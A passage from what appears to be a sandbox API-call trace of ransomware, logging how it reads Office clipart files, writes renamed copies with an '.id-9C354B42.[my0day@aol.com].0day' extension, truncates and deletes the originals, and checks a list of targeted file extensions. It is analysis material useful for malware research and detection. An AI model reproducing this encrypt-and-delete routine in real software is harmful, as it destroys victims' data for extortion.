hFile=0x354, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.346] SetEndOfFile (hFile=0x354) returned 1 [0269.346] CloseHandle (hObject=0x354) returned 1 [0269.346] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.346] SetEndOfFile (hFile=0x318) returned 1 [0269.354] CloseHandle (hObject=0x318) returned 1 [0269.354] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.354] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf")) returned 1 [0269.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0269.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0269.475] lstrlenW (lpString=".doc") returned 4 [0269.475] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.475] lstrlenW (lpString=".docx") returned 5 [0269.475] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.475] lstrlenW (lpString=".pdf") returned 4 [0269.475] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.475] lstrlenW (lpString=".xls") returned 4 [0269.475] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.475] lstrlenW (lpString=".xlsx") returned 5 [0269.475] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.475] lstrlenW (lpString=".ppt") returned 4 [0269.475] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0269.475] lstrlenW (lpString=".zip") returned 4 [0269.475] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.475] lstrlenW (lpString=".rar") returned 4 [0269.475] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.475] lstrlenW (lpString=".bz2") returned 4 [0269.475] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.475] lstrlenW (lpString=".7z") returned 3 [0269.475] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0269.475] lstrlenW (lpString=".dbf") returned 4 [0269.475] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0269.475] lstrlenW (lpString=".1cd") returned 4 [0269.476] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0269.476] lstrlenW (lpString=".jpg") returned 4 [0269.476] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0269.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0269.476] lstrlenW (lpString=".doc") returned 4 [0269.476] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.476] lstrlenW (lpString=".docx") returned 5 [0269.476] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.476] lstrlenW (lpString=".pdf") returned 4 [0269.476] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.476] lstrlenW (lpString=".xls") returned 4 [0269.476] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.476] lstrlenW (lpString=".xlsx") returned 5 [0269.476] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.476] lstrlenW (lpString=".ppt") returned 4 [0269.476] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0269.476] lstrlenW (lpString=".zip") returned 4 [0269.476] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.476] lstrlenW (lpString=".rar") returned 4 [0269.476] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.476] lstrlenW (lpString=".bz2") returned 4 [0269.476] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.476] lstrlenW (lpString=".7z") returned 3 [0269.476] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0269.476] lstrlenW (lpString=".dbf") returned 4 [0269.476] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0269.476] lstrlenW (lpString=".1cd") returned 4 [0269.476] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0269.477] lstrlenW (lpString=".jpg") returned 4 [0269.477] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.477] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.477] lstrlenW (lpString="BL00269_.WMF") returned 12 [0269.477] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0269.562] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=5272) returned 1 [0269.562] CloseHandle (hObject=0x318) returned 1 [0269.562] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf")) returned 0x20 [0269.630] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0269.661] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.661] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0269.784] GetLastError () returned 0x0 [0269.784] ReadFile (in: hFile=0x38c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x1498, lpOverlapped=0x0) returned 1 [0269.818] WriteFile (in: hFile=0x398, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x14a0, lpOverlapped=0x0) returned 1 [0269.985] ReadFile (in: hFile=0x38c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0269.985] WriteFile (in: hFile=0x398, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.985] SetEndOfFile (hFile=0x398) returned 1 [0270.062] CloseHandle (hObject=0x398) returned 1 [0270.374] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.374] SetEndOfFile (hFile=0x38c) returned 1 [0270.422] CloseHandle (hObject=0x38c) returned 1 [0270.422] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.498] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf")) returned 1 [0270.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0270.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0270.531] lstrlenW (lpString=".doc") returned 4 [0270.531] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.531] lstrlenW (lpString=".docx") returned 5 [0270.532] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.532] lstrlenW (lpString=".pdf") returned 4 [0270.532] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.532] lstrlenW (lpString=".xls") returned 4 [0270.532] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.552] lstrlenW (lpString=".xlsx") returned 5 [0270.563] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.565] lstrlenW (lpString=".ppt") returned 4 [0270.567] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0270.568] lstrlenW (lpString=".zip") returned 4 [0270.568] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.568] lstrlenW (lpString=".rar") returned 4 [0270.568] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.568] lstrlenW (lpString=".bz2") returned 4 [0270.568] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.568] lstrlenW (lpString=".7z") returned 3 [0270.568] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0270.568] lstrlenW (lpString=".dbf") returned 4 [0270.568] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0270.568] lstrlenW (lpString=".1cd") returned 4 [0270.568] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0270.568] lstrlenW (lpString=".jpg") returned 4 [0270.568] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0270.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0270.568] lstrlenW (lpString=".doc") returned 4 [0270.568] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.568] lstrlenW (lpString=".docx") returned 5 [0270.568] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.568] lstrlenW (lpString=".pdf") returned 4 [0270.568] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.568] lstrlenW (lpString=".xls") returned 4 [0270.568] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.568] lstrlenW (lpString=".xlsx") returned 5 [0270.569] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.569] lstrlenW (lpString=".ppt") returned 4 [0270.569] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0270.569] lstrlenW (lpString=".zip") returned 4 [0270.569] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.569] lstrlenW (lpString=".rar") returned 4 [0270.569] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.569] lstrlenW (lpString=".bz2") returned 4 [0270.569] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.569] lstrlenW (lpString=".7z") returned 3 [0270.569] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0270.569] lstrlenW (lpString=".dbf") returned 4 [0270.569] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0270.569] lstrlenW (lpString=".1cd") returned 4 [0270.569] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0270.569] lstrlenW (lpString=".jpg") returned 4 [0270.569] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.569] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0270.569] lstrlenW (lpString="BOAT.WMF") returned 8 [0270.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.570] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=3350) returned 1 [0270.570] CloseHandle (hObject=0x380) returned 1 [0270.570] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf")) returned 0x20 [0270.570] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.570] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.570] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.602] GetLastError () returned 0x0 [0270.602] ReadFile (in: hFile=0x380, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0xd16, lpOverlapped=0x0) returned 1 [0270.642] WriteFile (in: hFile=0x384, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xd20, lpOverlapped=0x0) returned 1 [0270.643] ReadFile (in: hFile=0x380, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0270.643] WriteFile (in: hFile=0x384, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xe4, lpOverlapped=0x0) returned 1 [0270.643] SetEndOfFile (hFile=0x384) returned 1 [0270.643] CloseHandle (hObject=0x384) returned 1 [0270.643] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.643] SetEndOfFile (hFile=0x380) returned 1 [0270.646] CloseHandle (hObject=0x380) returned 1 [0270.646] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.646] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf")) returned 1 [0270.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0270.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0270.646] lstrlenW (lpString=".doc") returned 4 [0270.646] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.646] lstrlenW (lpString=".docx") returned 5 [0270.646] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0270.646] lstrlenW (lpString=".pdf") returned 4 [0270.646] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.646] lstrlenW (lpString=".xls") returned 4 [0270.646] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.646] lstrlenW (lpString=".xlsx") returned 5 [0270.646] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0270.646] lstrlenW (lpString=".ppt") returned 4 [0270.647] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0270.647] lstrlenW (lpString=".zip") returned 4 [0270.647] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.647] lstrlenW (lpString=".rar") returned 4 [0270.647] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.647] lstrlenW (lpString=".bz2") returned 4 [0270.647] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.647] lstrlenW (lpString=".7z") returned 3 [0270.647] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0270.647] lstrlenW (lpString=".dbf") returned 4 [0270.647] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0270.647] lstrlenW (lpString=".1cd") returned 4 [0270.647] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0270.647] lstrlenW (lpString=".jpg") returned 4 [0270.647] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0270.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0270.647] lstrlenW (lpString=".doc") returned 4 [0270.647] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.647] lstrlenW (lpString=".docx") returned 5 [0270.647] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0270.647] lstrlenW (lpString=".pdf") returned 4 [0270.647] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.647] lstrlenW (lpString=".xls") returned 4 [0270.647] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.648] lstrlenW (lpString=".xlsx") returned 5 [0270.648] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0270.648] lstrlenW (lpString=".ppt") returned 4 [0270.648] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0270.648] lstrlenW (lpString=".zip") returned 4 [0270.648] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.648] lstrlenW (lpString=".rar") returned 4 [0270.648] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.648] lstrlenW (lpString=".bz2") returned 4 [0270.648] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.648] lstrlenW (lpString=".7z") returned 3 [0270.648] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0270.648] lstrlenW (lpString=".dbf") returned 4 [0270.648] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0270.648] lstrlenW (lpString=".1cd") returned 4 [0270.648] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0270.648] lstrlenW (lpString=".jpg") returned 4 [0270.648] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.648] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0270.648] lstrlenW (lpString="BS00100_.WMF") returned 12 [0270.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.649] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2378) returned 1 [0270.649] CloseHandle (hObject=0x380) returned 1 [0270.649] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf")) returned 0x20 [0270.649] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.649] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.649] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.650] GetLastError () returned 0x0 [0270.650] ReadFile (in: hFile=0x380, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x94a, lpOverlapped=0x0) returned 1 [0270.654] WriteFile (in: hFile=0x384, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x950, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x950, lpOverlapped=0x0) returned 1 [0270.655] ReadFile (in: hFile=0x380, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0270.655] WriteFile (in: hFile=0x384, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.655] SetEndOfFile (hFile=0x384) returned 1 [0270.655] CloseHandle (hObject=0x384) returned 1 [0270.656] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.656] SetEndOfFile (hFile=0x380) returned 1 [0270.658] CloseHandle (hObject=0x380) returned 1 [0270.658] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.658] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf")) returned 1 [0270.658] lstrlenW 